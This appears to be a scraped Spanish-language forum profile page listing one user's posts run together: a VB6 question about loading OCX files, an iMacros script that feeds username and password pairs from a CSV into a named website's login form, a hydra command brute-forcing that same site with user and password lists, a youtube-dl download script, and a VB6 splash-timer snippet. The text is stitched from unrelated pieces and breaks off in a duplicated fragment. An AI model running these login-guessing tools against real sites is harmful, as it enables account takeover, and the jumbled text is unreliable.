asi es como dice el asunto se podria hacer que vb6 carge unos ocx desde la carpeta de la aplicacion

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúVERSION BUILD=7401110 RECORDER=FX
TAB T=1
'Set iMacro datasource and column number
SET !DATASOURCE address.csv
'You may change this depending how many columns your CSV has
SET !DATASOURCE_COLUMNS 2
'Set the selected random column
SET !LOOP 1
SET !DATASOURCE_LINE {{!LOOP}}
URL GOTO=http://www.padventures.org/index.php/account/login.ide
SET !ENCRYPTION NO
TAG POS=1 TYPE=INPUT:PASSWORD FORM=ACTION:http://www.padventures.org/index.php/account/login.ide ATTR=NAME:name CONTENT={{!COL1}}
TAG POS=1 TYPE=INPUT:PASSWORD FORM=ACTION:http://www.padventures.org/index.php/account/login.ide ATTR=NAME:pass CONTENT={{!COL2}}
TAG POS=1 TYPE=INPUT:SUBMIT FORM=ACTION:http://www.padventures.org/index.php/account/login.ide ATTR=ID:et_contact_submit
hydra -l usuario.txt -vV -f -P pass.txt -vV -f www.padventures.org http-head /vclass/
#!/bin/bash
for FILE1 in $@
do
if [ -f $FILE1 ]; then
for FILE2 in $(cat $FILE1)
do
cookiefile="/tmp/cookies-$( date +%s.%N ).txt"
url=$( youtube-dl --cookies $cookiefile -g $FILE2 )
NAME=$(youtube-dl -t --get-filename $FILE2)
aria2c --load-cookies $cookiefile -k1M -x4 -c $url -o "$NAME"
rm -f $cookiefile
done
else
cookiefile="/tmp/cookies-$( date +%s.%N ).txt"
url=$( youtube-dl --cookies $cookiefile -g $FILE1 )
NAME=$(youtube-dl -t --get-filename $FILE1)
aria2c --load-cookies $cookiefile -k1M -x4 -c $url -o "$NAME"
rm -f $cookiefile
fi
done
Public X As Integer
Private Sub Form_Load()
Timer1.Interval = 150
End Sub
Private Sub Timer1_Timer()
X = X + 1
If X = 3 Then
INGRESAR.Show
Unload Me
End If
End Sub
X = X + 1
If X = 3 Then